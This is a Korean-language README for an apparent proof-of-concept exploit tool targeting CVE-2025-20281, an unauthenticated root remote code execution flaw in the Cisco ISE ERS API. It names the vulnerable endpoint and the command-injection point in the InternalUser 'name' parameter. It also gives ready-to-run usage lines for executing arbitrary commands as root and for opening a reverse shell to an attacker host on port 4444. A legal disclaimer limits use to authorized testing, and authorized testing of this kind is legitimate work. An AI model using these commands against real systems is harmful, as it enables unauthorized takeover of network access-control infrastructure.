
Cisco ISE ERS API의 CVE-2025-20281에 대한 인증되지 않은 원격 코드 실행 익스플로잇. 루트로 명령을 실행하거나 리버스 셸을 시작합니다 — 인증이 필요하지 않습니다.
이 저장소는 CVE-2025-20281에 대한 Python 3 개념 증명 익스플로잇입니다. 이는 **Cisco Identity Services Engine (ISE)**의 심각한 취약점으로, ERS API를 통해 **루트 권한으로 미인증 원격 코드 실행(RCE)**을 가능하게 합니다.
Cisco ISE ERS
/ers/sdk#_엔드포인트는 사용자 생성 요청을 처리할 때 인증을 검증하지 않습니다.
InternalUser객체의name매개변수에 셸 명령어를 주입함으로써 공격자는 루트 권한으로 명령 실행을 달성할 수 있습니다.
--cmd)--whoami로 빠른 테스트--reverse)python3 CVE-2025-20281.py TARGET [--whoami | --cmd "id" | --reverse LHOST LPORT]
테스트 명령:
python3 CVE-2025-20281.py 192.168.1.10 --whoami
사용자 정의 명령:
python3 CVE-2025-20281.py 192.168.1.10 --cmd "id && hostname"
리버스 셸:
python3 CVE-2025-20281.py 192.168.1.10 --reverse 10.10.14.99 4444
⚠️ 법적 고지
이 코드는 교육 및 승인된 테스트 목적으로만 제공됩니다. 이 소프트웨어를 소유하거나 테스트할 권한이 없는 네트워크나 시스템에 사용하지 마십시오.
취약점: Cisco 권고를 통해 공개됨
PoC 리펙토링: illdeed